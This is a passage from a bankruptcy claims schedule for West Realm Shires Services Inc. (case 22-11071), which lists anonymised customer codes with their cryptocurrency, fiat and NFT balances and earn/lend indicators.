| 07310235 | | BTC[.02259729], ETH[0], NFT (311260092075390703/Vintage Sahara #176)[1], NFT (311789832923163870/Entrance Voucher #3614)[1], NFT (346542225404517380/The 2974 Collection #2533)[1], NFT (388956904616149982/Birthday Cake #2533)[1], NFT (398379767489875522/FTX - Off The Grid Miami #374)[1], NFT (404842693745151441/The Hill by FTX #148)[1], NFT (446108970960703422/The District #43-Rookie)[1], NFT (454794976675145677/Wild Wild Bear )[1], NFT (495032837392062433/2974 Floyd Norman - CLE 4-0142)[1], NFT (495905246705729491/2974 Floyd Norman - OKC 4-0046)[1], NFT (500141736553240175/Beasts #630)[1], NFT (505525501169648009/Red Panda #573)[1], NFT (509082694431787291/Vintage Sahara #100)[1], NFT (528347768328108746/Central City Estate #40)[1], NFT (533937963521435314/Humpty Dumpty #33)[1], SOL[7.14168816], USD[202.48], USDT[3] | | SOL[5] |
| 07310237 | | BTC.00007464], USD[0.01], USDT[0] | | |
| 07310238 | | USD[2.26] | | |
| 07310241 | | BTC[0], DOGE[0], ETH[0], LTC[0], UNI[1.35064809], USD[32.68] | | |
| 07310247 | | BTC[.0005], ETH[0], USD[0.00] | | |
| 07310251 | | BTC[0.00000001], DOGE[1], GRT[1], LTC[0.01740426], SHIB[2800005], SOL[38.28000000], TRX[3], USD[68.10], USDT[0] | | |
| 07310257 | | USDT[0] | | |
| 07310258 | | USD[10.22] | | |
| 07310260 | | BTC[0.00000576], LINK[.058], USD[0.76], USDT[1.5186] | | |
| 07310262 | | BTC[0], GRT[.996], USD[4.69], USDT[0] | | |
| 07310266 | | USD[1.01] | | |
| 07310270 | | USDT[0.00016715] | | |
| 07310273 | | BTC[0], MATIC[2.11146321] | | |
| 07310280 | | DAI[1], USD[0.71] | | |
| 07310288 | | DOGE[0], ETH[0], USD[1.19], USDT[0] | | |
| 07310292 | | USD[0.00], USDT[0] | | |
| 07310294 | | USD[2.13], USDT[.6215117] | | |
| 07310301 | | DOGE[0], LTC[0], TRX[0], YFI[0] | | |
| 07310303 | | SOL[19.98], USD[240.00] | | |
| 07310305 | | USD[0.87], USDT[1.0088722] | | |
| 07310311 | | ETH[0], USD[0.00] | | |
| 07310312 | | ETH[0], MATIC[0], SOL[0], TRX[0] | | |
| 07310316 | | BTC[0.00004429], ETH[.000112], ETHW[.000112], USD[0.00], USDT[0] | | |
| 07310320 | | DOGE[612.95738661], ETH[.00000001], ETHW[0], USD[0.00], USDT[0] | | |

West Realm Shires Services Inc.

22-11071 (JTD)

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07310321 | | BTC[.0000898], USD[221.20] | | |
| 07310328 | | ALGO[.798], AVAX[.0779], BTC[.0078], GRT[.241], NFT (439543188861658447/Cow #1346)[1], NFT (562939794636193977/Highland Mesa #189)[1], SOL[27.27], USD[0.39] | | |
| 07310341 | | AAVE[.009488], BTC[0.00000521], DOGE[.839], LINK[.04168], LTC[.009044], SOL[.004736], TRX[.553601], USD[0.01], USDT[0] | | |
| 07310359 | | USD[0.01] | | |
| 07310369 | | USD[0.00], USDT[.00464192] | | |
| 07310371 | | BTC[0], GRT[0], SOL[0], USD[0.00], USDT[0] | | |
| 07310373 | | BTC[0] | | |
| 07310379 | | BTC[.0005], USD[10.00] | | |
| 07310381 | | ETH[0], ETHW[0], NFT (336398433655080044/APEFUEL by Almond Breeze #46)[1], NFT (447126183359700925/Birthday Cake #1798)[1], NFT (491227307990693055/The 2974 Collection #1798)[1], NFT (527978146095819033/Birthday Cake #0926)[1], NFT (547763071826710969/The 2974 Collection #0926)[1], USD[0.02], USDT[0] | | |
| 07310383 | | USD[10.00] | | |
| 07310392 | | BTC[0], DOGE[0], ETH[.00000001], ETHW[0.00065002], LINK[.05154], SUSHI[0.13488600], USD[3803.29], USDT[10.19205024] | | |
| 07310399 | | BCH[.000364], BTC[0.00007190], DOGE[.188], ETH[.00082914], ETHW[.00082914], GRT[.792], LINK[.0332], LTC[.00624], SOL[.0368], SUSHI[.396], UNI[.0472], USD[0.00], YFI[.00092] | | |
| 07310404 | | USD[10.00] | | |
| 07310405 | | USD[10.00] | | |
| 07310406 | | USD[0.00] | | |
| 07310408 | | BTC[0], ETH[0.00000001], ETHW[0], NFT (289603004242060643/GSW Championship Commemorative Ring)[1], NFT (304185953613568802/Warriors Hoop #68 (Redeemed))[1], NFT (304473476816902907/GSW Western Conference Finals Commemorative Banner #569)[1], NFT (336136375092019212/GSW Round 1 Commemorative Ticket #538)[1], NFT (347389011985033134/GSW Western Conference Semifinals Commemorative Ticket #312)[1], NFT (387752133928960540/GSW Western Conference Semifinals Commemorative Ticket #314)[1], NFT (396543203415818828/GSW Round 1 Commemorative Ticket #92)[1], NFT (409360873201975285/GSW Western Conference Finals Commemorative Banner #564)[1], NFT (415709182411673165/Warriors Hoop #584 (Redeemed))[1], NFT (419805382912402671/GSW Championship Commemorative Ring)[1], NFT (419955557490386656/GSW Round 1 Commemorative Ticket #539)[1], NFT (429445184452507351/GSW Western Conference Semifinals Commemorative Ticket #313)[1], NFT (466360165172344699/GSW Western Conference Finals Commemorative Banner #565)[1], NFT (484514447309448932/GSW 75 Anniversary Diamond #422 (Redeemed))[1], NFT (506637702609871366/GSW Western Conference Finals Commemorative Banner #566)[1], NFT (543609474472523373/GSW Championship Commemorative Ring)[1], NFT (544604048563073595/GSW Western Conference Finals Commemorative Banner #567)[1], NFT (559971506506982847/GSW Western Conference Finals Commemorative Banner #568)[1], SOL[0], USD[0.00], USDT0.00024298] | | |
| 07310410 | | LINK[0], SOL[0.00000001], TRX[0], USD[15.45], USDT[0.00737600] | | |
| 07310417 | | USD[0.00] | | |
| 07310418 | | NFT (306512941666733090/Coachella x FTX Weekend 2 #4242)[1], NFT (513624380777953414/Coachella x FTX Weekend 1 #12626)[1] | | |
| 07310427 | | MATIC[290], USD[8.66] | | |
| 07310431 | | USD[10.00] | | |
| 07310432 | | USD[10.00] | | |
| 07310433 | | USD[10.00] | | |
| 07310434 | | USD[10.00] | | |
| 07310435 | | USD[10.00] | | |
| 07310437 | | USD[10.00] | | |
| 07310439 | | BTC[0.00003950], ETH[0.00050000], ETHW[.0005], LINK[0], LTC[.008], MATIC[0], SOL[0], SUSHI[0], TRX[.00000001], USD[126.32], USDT[0] | | |
| 07310447 | | BTC[0.00004408], SOL[0], SUSHI[.13], USD[0.42] | | |
| 07310451 | | BTC[.00000063], LINK[.0972], USD[1.13] | | |
| 07310467 | | BTC[.00002993] | | |
| 07310477 | | USD[0.00] | | |
| 07310478 | | USD[4756.54] | | |
| 07310484 | | DOGE[57.768], SOL[.0199], UNI[.0919], USD[0.00] | | |
| 07310492 | | USD[10.00] | | |
| 07310493 | | USD[10.00] | | |
| 07310498 | | USD[0.00] | | |
| 07310499 | | USD[1.74] | | |
| 07310500 | | ETH[.999], USD[2.00] | | |
| 07310509 | | BRZ[.73], BTC[0.00001558], LTC[0], SOL[.00932], USD[0.00] | | |
| 07310522 | | TRX[80.7058599], USD[0.00] | | |
| 07310528 | | USD[0.88] | | |
| 07310529 | | SOL[0], USD[0.00] | | |
| 07310542 | | USD[0.26], USDT[.18871269] | | |
| 07310545 | | DOGE[.597], USD[0.00] | | |
| 07310554 | | NFT (360764760962446074/Raydium Alpha Tester Invitation)[1], NFT (389319400932206327/Raydium Alpha Tester Invitation)[1], NFT (439028679337831179/Raydium Alpha Tester Invitation)[1], NFT (443608569915280729/Baddies #2721)[1], NFT (487382452717933932/Raydium Alpha Tester Invitation)[1], NFT (491236214419579646/Raydium Alpha Tester Invitation)[1], NFT (491598751767102253/Raydium Alpha Tester Invitation)[1], NFT (501221931747624052/Baddies #3309)[1], NFT (525062761696801551/Raydium Alpha Tester Invitation)[1], NFT (545823398260261343/Raydium Alpha Tester Invitation)[1], NFT (552439153393483196/Raydium Alpha Tester Invitation)[1], NFT (562866138010580655/Raydium Alpha Tester Invitation)[1], SOL[0], USD[11.05] | | |
| 07310557 | | DOGE[0], ETH[0], GRT[0], USD[0.00], USDT[0] | | |
| 07310558 | | SOL[0], TRX[0], USD[0.03] | | |
| 07310560 | | BTC[.000044], SOL[559.552] | | |
| 07310561 | | BTC[0] | | |
| 07310567 | | USD[0.00] | | |
| 07310569 | | BTC[0], DOGE[0], ETH[0], LINK[0], SUSHI[0], USD[0.12], USDT[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07310580 | | USD[10.00] | | |
| 07310586 | | ETH[.00019674], ETHW[.00019674], SOL[0.00000002], USD[0.00], USDT[0.00000012] | | |
| 07310587 | | SOL[.00684] | | |
| 07310591 | | USD[0.00], USDT[2.09262] | | |
| 07310598 | | BTC[0], ETH[0], SOL[0], USD[0.11], USDT[0.00021938] | | |
| 07310601 | | BTC[0], ETHW[0.09317764], USD[137.58] | | |
| 07310602 | | USD[0.00] | | |
| 07310606 | | BTC[0], SOL[0], USD[0.00], USDT[0] | | |
| 07310609 | | BTC[0.00005816], ETH[.00052167], ETHW[0.00052167], LINK[.07688], USD[0.00] | | |
| 07310610 | | BTC[0.00002282], ETH[.000664], ETHW[0.00066400], LINK[.04742187], SOL[.858], USD[0.02], USDT[0.01044415] | | |
| 07310612 | | BCH[0], BTC[0.00021949], DOGE[0], ETH[0], SOL[.02122], SUSHI[0.21900000], USD[0.00], USDT[0.00266022] | | |
| 07310613 | | BTC[0], DOGE[.748], LTC[0.00534127], SOL[.0388], USD[14.82] | | |
| 07310615 | | USD[10.00] | | |
| 07310616 | | USD[10.00] | | |
| 07310626 | | BTC[0], DOGE[0], SOL[1.10316471], USD[4.27], USDT[0] | | |
| 07310627 | | AAVE[0], AVAX[0], BCH[0], BTC[0.00222713], DOGE[0], ETH[0.00084767], ETHW[-0.02033625], GRT[0], LINK[0], LTC[0.00000001], MATIC[0], MKR[0], SOL[0.00000001], TRX[0], UNI[0], USD[3604.16], USDT[0.00000001], YFI[0] | | |
| 07310629 | | ETH[.00018417], ETHW[.00018417] | | |
| 07310637 | | SOL[29.88], USD[1.46] | | |
| 07310638 | | USD[10.00] | | |
| 07310639 | | USD[10.00] | | |
| 07310641 | | USD[10.00] | | |
| 07310642 | | USD[10.00] | | |
| 07310643 | | USD[0.00] | | |
| 07310651 | | BTC[0], DOGE[0], ETH[0], GRT[0], LTC[0], SUSHI[0], TRX[0], USD[0.08], USDT[0] | | |
| 07310653 | | BAT[1.31771673], BTC[.00013307], ETH[0.00107231], ETHW[0.00107231], LINK[0.00007080], SOL[0.42849561], SUSHI[0.06828952], USD[10.53], USDT[0.00000001] | | |
| 07310654 | | USD[0.00] | | |
| 07310660 | | BTC[0], DOGE[0], ETH[0], LTC[0], SOL[0], SUSHI[0], TRX[0], USD[0.00] | | |
| 07310662 | | ETH[.00000001], USD[0.00] | | |
| 07310663 | | DOGE[.27585317], USD[0.00], USDT[0] | | |
| 07310666 | | ETH[.146598], ETHW[.146598], NFT [322403565425066443/FTX Crypto Cup 2022 Key #25313][1], NFT [48147417192245447/MCCT 2022 FTX Crypto Cup Trophy (Fan Edition)][1], USD[1.44] | | |
| 07310672 | | BTC[0.00000301], DAI[.00000001], ETH[0], ETHW[0], USD[0.48], USDT[0.00971137] | | |
| 07310673 | | ETH[0], SOL[0], SUSHI[0], USD[0.00], USDT[0] | | |
| 07310674 | | USD[0.00] | | |
| 07310681 | | BTC[.000038], ETH[.00092846], ETHW[.00092846], USD[0.00], WBTC[.07680919] | | |
| 07310687 | | BTC[0.10956560], DOGE[283.86], USD[0.00] | | |
| 07310691 | | BTC[0], USD[2.37], USDT[.07571] | | |
| 07310696 | | BCH[.00028265], BTC[0.00000002], DOGE[0], ETH[0.00032046], ETHW[0.00031220], SOL[0], SUSHI[0], USD[1.53], USDT[0.00000001] | | |
| 07310698 | | BTC[0], USD[0.00] | | |
| 07310700 | | USD[10.00] | | |
| 07310701 | | USD[10.00] | | |
| 07310705 | | AAVE[.0024315], ALGO[.38395], BTC[0.00003155], DOGE[2.23025], ETH[0.00194290], LTC[.00906625], NFT [304142890964567355/Wonky Stonk #7127][1], SOL[.0064845], USD[0.00], USDT[0] | | |
| 07310710 | | ETH[.00057871], ETHW[0.00057870], SOL[0], USD[17.62] | | |
| 07310713 | | LTC[15.90890866], USD[0.00] | | |
| 07310714 | | TRX[.00001], USD[1.22], USDT[0] | | |
| 07310718 | | BTC[.0000228], USD[1.20] | | |
| 07310720 | | BTC[0.00004441], SOL[.016], USD[0.67], USDT[0.05916380] | | |
| 07310721 | | USD[0.00] | | |
| 07310728 | | DOGE[.668], SOL[69.94], USD[0.13] | | |
| 07310730 | | SOL[.00121451], USD[0.22] | | |
| 07310731 | | BTC[.00009266] | | |
| 07310744 | | BTC[0.01098758], ETH[.783392], ETHW[.783392], SOL[.004375], SUSHI[.0538], UNI[.64042], USD[292.18], USDT[38.57741277] | | |
| 07310758 | | USD[116.87] | | |
| 07310761 | | USD[0.00], USDT[0] | | |
| 07310765 | | BTC[0.05839742], DOGE[0], ETH[1.32904439], ETHW[1.32904439], USD[0.04] | | |
| 07310768 | | BTC[.0000701], ETH[.15885], ETHW[.15885], SOL[.002], USD[121.13] | | |
| 07310770 | | BTC[.00004624], ETH[0], SOL[10], USD[0.00] | | |
| 07310775 | | DOGE[.464], USD[0.06], USDT[0] | | |
| 07310777 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07310778 | | NFT [38244845478325299/FTX - Off The Grid Miami #5499][1], TRX[0], USD[100.04], USDT[.007244] | | |
| 07310782 | | DOGE[.236], USD[0.00] | | |
| 07310784 | | BTC[0], LTC[.0010397], SOL[.0387346], USD[48.26], USDT[0.00002342] | | |
| 07310786 | | BTC[0], ETH[0.00000005], ETHW[0.00000005], SOL[23.62389161], USD[-0.05] | | SOL[23.038458] |
| 07310790 | | BTC[0], ETH[0], USD[0.00] | | |
| 07310791 | | USD[0.02] | | |
| 07310798 | | BTC[0], DOGE[0], ETHW[.072], USD[257.71] | | |
| 07310800 | | BTC[0], USD[0.00] | | |
| 07310801 | | BCH[.000976], BTC[0.00002918], DOGE[0.43728048], ETH[.000232], ETHW[.000232], GRT[.62], SOL[0.23872157], SUSHI[0.42976186], TRX[.332], UNI[.0066], USD[0.03] | | |
| 07310804 | | DOGE[183.81600000], SHIB[199800], SOL[1.81776939], USD[0.07] | | |
| 07310816 | | BTC[0], LINK[0], SOL[0], USD[512.22] | | |
| 07310819 | | ALGO[8.07068245], BTC[.00000002], ETHW[0], NEAR[0], NFT [517950653950175051/APEFUEL by Almond Breeze #554i][1], SHIB[1011020.13272216], SOL[0.00000001], TRX[2], USD[0.01] | Yes | |
| 07310820 | | BTC[0.00000003], DOGE[0], ETH[0.00000004], ETHW[0.00000001], LINK[0.00000001], SOL[0.00000003], SUSHI[0], TRX[0], USD[0.67], USDT[0.00000055] | | |
| 07310826 | | NFT [371528796517903423/SOLYETIS #8417][1], SOL[.68] | | |
| 07310828 | | USD[0.00] | | |
| 07310835 | | USDT[0] | | |
| 07310836 | | BTC[0], ETH[.00042238], ETHW[.00042238], SOL[0.15394209], SUSHI[.23296967], USD[0.00], USDT[.86212825] | | |
| 07310837 | | BTC[0], USD[0.00] | | |
| 07310838 | | ETH[.0005], ETHW[.00056616], USD[13.22] | | |
| 07310844 | | DOGE[.928], ETH[.000548], ETHW[.000548], UNI[.0528], USD[8.36] | | |
| 07310847 | | ETHW[.00095398], USD[3000.00], USDT[0] | | |
| 07310848 | | BTC[0.00001811], LINK[70.5168], UNI[59.94] | | |
| 07310849 | | USD[0.00] | | |
| 07310854 | | BTC[0] | | |
| 07310855 | | TRX[.000028], USDT[.45645] | | |
| 07310859 | | SOL[.002619], USD[2.87] | | |
| 07310863 | | BTC[0], USD[0.20] | | |
| 07310867 | Contingent, Unliquidated | BTC[0], ETH[0], SOL[0], USD[0.00], USDT[0] | | |
| 07310871 | | BTC[.0000051], DOGE[194.22], SOL[6.972], USD[1.44] | | |
| 07310872 | | USD[10.00] | | |
| 07310873 | | USD[10.00] | | |
| 07310874 | | BTC[0], SOL[0], USD[0.00], USDT[0.00000078] | | |
| 07310876 | | USD[0.18] | | |
| 07310879 | | BTC[.00167367], ETH[.00000001], ETHW[1.00131260], LTC[0.03501333], USDT[1.2578936] | | |
| 07310880 | | USD[10.00] | | |
| 07310882 | | ETH[.0000633], ETHW[.0000633], SOL[28.8520895], USD[6.83] | | |
| 07310889 | | ETH[.00044479], ETHW[.00044479], USD[0.14] | | |
| 07310891 | | SHIB[11250000], USD[1.08] | | |
| 07310892 | | GRT[4.00581906], SHIB[3086478.5665177], USD[0.00] | Yes | |
| 07310893 | | NFT [36144013693160049/Cold & Sunny #415][1] | | |
| 07310898 | | USD[10.00] | | |
| 07310899 | | USD[10.00] | | |
| 07310904 | | USD[10.00] | | |
| 07310905 | | USD[0.16] | | |
| 07310914 | | USD[1.21] | | |
| 07310920 | | USD[10.00] | | |
| 07310921 | | USD[10.00] | | |
| 07310923 | | DOGE[0], ETH[0], GRT[0], LINK[0], USD[0.00], USDT[0] | | |
| 07310930 | | USD[11.12] | Yes | |
| 07310935 | | USD[10.00] | | |
| 07310939 | | ETH[.00003508], ETHW[0.00003508], USD[0.00], USDT[0] | | |
| 07310941 | | USD[10.00] | | |
| 07310947 | | BTC[0], ETH[0], ETHW[-7.12745017], USD[239.77] | | |
| 07310950 | | BTC[0], USD[0.44], USDT[.7976319] | | |
| 07310956 | | USD[0.00] | | |
| 07310960 | | BAT[449.75082397], BTC[0.00005158], ETH[0.62181051], ETHW[0.62181051], SHIB[43903216.15590216], SOL[15.97162078], USD[3612.17], USDT[0] | | |
| 07310965 | | NFT [548157303956444753/Bariz Art Labs][1], USD[40.00] | | |
| 07310966 | | AAVE[2.09559194], AVAX[.00004199], BRZ[2], BTC[.00000079], DAI[.00034112], DOGE[6], ETHW[10.21902594], NEAR[134.62324606], SHIB[20], SUSHI[66.47780024], TRX[2], USD[0.00], USDT[1.0229027] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07310068 | | BTC[.00001625] | | |
| 07310069 | | DOGE[42.8537], ETH[.00050885], ETHW[.00050885], USD[0.04] | | |
| 07310976 | Contingent, Disputed | LTC[0], USD[0.00], USDT[0] | | |
| 07310978 | | USD[10.00] | | |
| 07310979 | | USD[10.00] | | |
| 07310986 | | USD[10.00] | | |
| 07310993 | | DOGE[0], ETH[0], SOL[0], USD[0.69], USDT[0.00000001] | | |
| 07310996 | | BTC[0], DOGE[0.00260228], ETH[0.00000457], ETHW[0.00675457], GRT[0], LINK[0.00962725], MATIC[0.00464212], MKR[.00111056], SOL[0.00044160], SUSHI[0.00577560], TRX[.00390733], UNI[0.00740481], USD[0.00], YFI[0] | | |
| 07310997 | | TRX[.000004], USD[0.00] | | |
| 07310998 | | ETH[2.62457296], ETHW[2.62457296], USD[0.51] | | |
| 07311003 | | BAT[.0031768], ETH[.00000001], NFT (39368307702760395 9/SBF Hair & Signature #2 #121)[1], NFT (498463202545040902/Spiky FTX)[1], SOL[.689], USD[1.80] | | |
| 07311004 | | USD[10.00] | | |
| 07311005 | | USD[10.00] | | |
| 07311011 | | BAT[0], BTC[0], ETH[0], LTC[0], SUSHI[0], USD[0.00], USDT[0] | | |
| 07311013 | | BTC[.00003062] | | |
| 07311026 | | SOL[.272], USD[0.25] | | |
| 07311027 | | USD[10.70], USDT[0] | | |
| 07311028 | | ETH[.42255068], ETHW[0.42255068], SOL[3.17299129], USD[0.00] | | |
| 07311029 | | USD[10.00] | | |
| 07311030 | | USD[10.00] | | |
| 07311031 | | USD[10.00] | | |
| 07311032 | | USD[10.00] | | |
| 07311039 | | SOL[.852], SUSHI[172.745], USD[0.00], USDT[1597.757877], YFI[.038687] | | |
| 07311041 | | USD[0.54] | | |
| 07311042 | | BTC[0.00001000], SOL[0], SUSHI[0], USD[0.00] | | |
| 07311046 | | BF_POINT[400], ETH[0], USD[0.00] | | |
| 07311047 | | DOGE[0], ETH[0], NFT (298212323655653470/Tim Brown's Playbook: San Diego Chargers vs. Los Angeles Raiders - September 4, 1988 #27)[1], NFT (299539872808074313/Bahrain Ticket Stub #1800)[1], NFT (300495004170296019/Dr.Pepe )[1], NFT (308480068710705794/Doak Walker's Playbook: Texas vs. SMU - November 1, 1947 #39)[1], NFT (310114145822713232/Pixel Rat 7090)[1], NFT (317270707931796146/Marcus Allen's Playbook: Los Angeles Raiders vs. Washington - January 22, 1984 #30)[1], NFT (319998052758426711/Joe Theismann's Playbook: Notre Dame vs. USC - November 30, 1968 #18)[1], NFT (353846269386253756/Marcus Allen's Playbook: Kansas City Chiefs vs. Detroit Lions - November 1, 1994 #27)[1], NFT (374974063409263977/Tim Brown's Playbook: Kansas City Chiefs vs. Oakland Raiders - December 9, 2001 #25)[1], NFT (385398880125229567/Joe Theismann's Playbook: Washington vs. Miami Dolphins - January 30, 1983 #26)[1], NFT (393275665270305803/Earl Campbell's Playbook: Rice vs. Texas - October 1st, 1977 #40)[1], NFT (405288234785487879/Geckos Spaceship)[1], NFT (412962635928606279/Joe Theismann's Playbook: Washington vs. Chicago Bears - September 29, 1985 #28)[1], NFT (436928758851144942/Doak Walker's Playbook: Detroit Lions vs. Cleveland Browns - December 28, 1952 #33)[1], NFT (456536874830712944/Tim Brown's Playbook: Michigan State vs. Notre Dame - September 19, 1987 #22)[1], NFT (462021582401183709/Tim Brown's Playbook: New York Jets vs. Oakland Raiders - December 2, 2002 #28)[1], NFT (489127399335780984/The Hill by FTX #6124)[1], NFT (489582563045194735/Joe Theismann's Playbook: Notre Dame vs. USC - November 30, 1968 #19)[1], NFT (493523720459663564/Doak Walker's Playbook: Cleveland Brown vs. Detroit Lions - December 27, 1953 #39)[1], NFT (504853056957504310/Joe Theismann's Playbook: New York Giants vs. Washington - October 20, 1974 #25)[1], NFT (507125102691328703/Marcus Allen's Playbook: USC vs. Washington - November 14, 1981 #31)[1], NFT (516292373635546311/Earl Campbell's Playbook: LA Rams vs Houston Oilers - September 4th, 1978 #39)[1], NFT (518642733956747220/Bold Badger #3987)[1], NFT (531937637435025210/Pepega #268)[1], NFT (536219444761815404/Doak Walker's Playbook: SMU vs. Santa Clara - September 27, 1947 #42)[1], NFT (546564601435498279/Goblin Experiment 8009)[1], NFT (573071412959553690/Earl Campbell's Playbook: Houston Oilers vs. Chicago Bears - November 16, 1980 #44)[1], SOL[0.00000001], USD[139.01], USDT[0] | | |
| 07311054 | | USD[10.00] | | |
| 07311055 | | USD[10.00] | | |
| 07311058 | | BF_POINT[200], BTC[0], ETH[0], ETHW[0], MATIC[0], USDT[.07319] | | |
| 07311064 | | ETH[0], ETHW[0], SOL[.00000001], TRX[.000066], USD[0.00], USDT[0] | | |
| 07311070 | | BTC[0.00004266], LINK[.0449225], LTC[.00245575], SOL[.456], UNI[0.00479414], USD[16281.56] | | |
| 07311083 | | SOL[0.92583776] | | |
| 07311090 | | USD[0.00] | | |
| 07311093 | | USD[0.00] | | |
| 07311095 | | BTC[.00004634], LTC[.006], SOL[.012], SUSHI[6.972], USD[0.00] | | |
| 07311103 | | DOGE[1222.00410104], SOL[2.46495717], TRX[1327.671], USD[0.90] | | |
| 07311106 | | ETHW[.5], USD[10.00], USDT[0] | | |
| 07311107 | | SOL[0], USD[0.68] | | |
| 07311109 | | DOGE[0], SOL[0] | | |
| 07311111 | | SOL[7.7448], USD[0.01] | | |
| 07311122 | | BTC[0], DAI[.00000001], ETH[0], NFT (350482221633902566/Entrance Voucher #2387)[1], SHIB[1], SOL[0], USD[0.18], USDT[0], WBTC[0] | | |
| 07311128 | | ETH[.00469039], ETHW[1.98523934], SOL[0], USD[0.00] | | |
| 07311130 | | BTC[0], DOGE[0], SOL[0.00621548], USD[0.00] | | |
| 07311131 | | USDT[0] | | |
| 07311132 | | BTC[0], ETH[0], ETHW[0], SOL[0], USD[145.25] | | |
| 07311136 | | AUD[0.00], AVAX[0], BTC[0.00000002], CAD[0.00], CUSDT[0], DOGE[0], ETH[0.14200000], ETHW[0], EUR[0.00], GBP[0.00], NFT (371199615227735591/Official Solana NFT)[1], SOL[0], USD[1.77], USDT[0.00000002] | | |
| 07311138 | | SOL[561.10415], USD[1.49] | | |
| 07311140 | | BTC[0.00008541], SUSHI[.38], USD[1.42] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07311144 | | ETH[.434], ETHW[.384], USD[510.57], WBTC[0] | | |
| 07311146 | | BTC[0] | | |
| 07311148 | | AUD[0.00], AVAX[0.00000002], BCH[0.00000008], BTC[0.00000002], CAD[0.00], ETH[0], ETHW[0], EUR[0.00], GBP[0.00], MATIC[10129.54988772], NFT (295880601035921006/Night Light #770)[1], NFT (362296072563003989/The 2974 Collection #2611)[1], NFT (413554373765654779/Golden Hill #897)[1], NFT (446333185217568366/Humpty Dumpty #158)[1], NFT (475408568167549364/Golden Hill #682)[1], NFT (478965355536863051/The 2974 Collection #2147)[1], NFT (507093168050202391/2974 Floyd Norman - OKC 1-0144)[1], NFT (525602351634625666/Night Light #297)[1], NFT (536936468616327790/Birthday Cake #2611)[1], NFT (542243316144063742/Birthday Cake #2147)[1], NFT (552041483460634857/2974 Floyd Norman - OKC 1-0121)[1], SOL[0], SUSHI[0.16235886], USD[9067.90], USDT[0], WBTC[0.00385560] | WBTC[.000017] | |
| 07311152 | | BTC[0.00005320], ETH[0], ETHW[0], SOL[0], SUSHI[0], UNI[0], USD[0.00], USDT[0] | | |
| 07311155 | | NFT (447695604388838881/Saudi Arabia Ticket Stub #53)[1], NFT (559923393200950532/FTX - Off The Grid Miami #2681)[1] | | |
| 07311157 | | USD[10.00] | | |
| 07311161 | | BTC[0.00182380], LINK[.04461] | | |
| 07311162 | | SOL[0], USD[1135.54] | | |
| 07311168 | | ETHW[0.08260925], SOL[30.261715], USD[6.74] | | |
| 07311169 | | BCH[0], BTC[0], DOGE[0], ETH[0], SOL[0], USD[0.00] | | |
| 07311170 | | BTC[0], DOGE[15.81467138], ETH[0], GRT[0], SOL[0.00037537], USD[0.00], USDT[0] | | |
| 07311174 | | USD[0.19] | | |
| 07311175 | | BTC[0], GRT[0], USD[0.00], USDT[3.61098331] | | |
| 07311176 | | BTC[0], USD[0.00] | | |
| 07311189 | | AVAX[0], DOGE[0], ETH[0], ETHW[0], GRT[0], LTC[0], MATIC[3.996], SOL[0], SUSHI[0], TRX[0], USD[0.98] | | |
| 07311194 | | AVAX[.00000001], BTC[0], ETH[.00000005], ETHW[0], MKR[.00000001], NFT (382011765054872112/Imola Ticket Stub #1733)[1], NFT (393219246432666369/Good Boy #132)[1], SOL[.00000001], USD[1.20] | | |
| 07311195 | | BTC[0], ETH[.00000001], ETHW[19.59010901], USD[0.01] | | |
| 07311200 | | USD[10.00] | | |
| 07311202 | | BTC[0], DOGE[.064], ETH[.000554], ETHW[.000554], USD[7.00] | | |
| 07311205 | | NFT (294234329431445019/FTX - Off The Grid Miami #5305)[1] | | |
| 07311208 | | AAVE[.00695794], BAT[.6554], ETH[.0000837], ETHW[.0000837], LINK[.04254157], SUSHI[.3607], TRX[.000001], USD[0.00], USDT[0 | | |
| 07311210 | | USD[10.00] | | |
| 07311211 | | USD[10.00] | | |
| 07311213 | | USD[10.00] | | |
| 07311214 | | BTC[.00006207], LINK[.014], USD[0.00], USDT[0] | | |
| 07311215 | | BTC[0] | | |
| 07311217 | | DOGE[1], NEAR[7.3596193], SHIB[3], TRX[1], USD[8.81] | | |
| 07311221 | | USD[0.00] | | |
| 07311222 | | USD[10.00] | | |
| 07311223 | | USD[10.00] | | |
| 07311224 | | BTC[.00003492], ETHW[.004759], USD[20.11] | | |
| 07311227 | | AAVE[.00000001], BTC[0], DOGE[0], ETH[0.00000001], ETHW[0.00000001], LINK[0], SOL[0.00000001], SUSHI[0.00000001], USD[0.00], USDT[0.00000001] | | |
| 07311231 | | USD[0.00], USDT[.8562458] | | |
| 07311232 | | BTC[0.00003777], GRT[.433], SOL[.0274], SUSHI[.4955], UNI[.09384], USD[1.82] | | |
| 07311234 | | BTC[.00003947], DOGE[0], ETH[0], NFT (536469792885636156/Entrance Voucher #1721)[1], SOL[0], USD[1.36] | | |
| 07311240 | | ETH[0], USD[0.39] | | |
| 07311247 | | ETH[0], SOL[0], USD[0.00] | | |
| 07311248 | | USD[10.00] | | |
| 07311249 | | SOL[0], USD[0], USDT[0.00000001] | | |
| 07311250 | | BTC[0], NFT (293480636605282334/Digital Z #24)[1], NFT (303757090635588910/BANANA #19)[1], NFT (309840328614247999/#30 COVID)[1], NFT (310753228977971890/Voxel Animals #18)[1], NFT (322459217134776609/Voxel Animals #12)[1], NFT (544636352889094145/BANANA #13)[1], NFT (567938169127964138/DarkPunk #3954)[1], USD[0.50] | | |
| 07311254 | | BTC[.00013046], ETH[.00438216], ETHW[0.00438215] | | |
| 07311255 | | ETH[.996], ETHW[.996], SOL[16.39], USD[0.74] | | |
| 07311257 | | BTC[0], ETH[0], ETHW[0], SOL[0], SUSHI[0], USD[0.00] | | |
| 07311262 | | BTC[.00009209], USD[0.47] | | |
| 07311267 | | BTC[0], ETH[0], SOL[0], TRX[0], USD[0.47], USDT[0.00000074] | | |
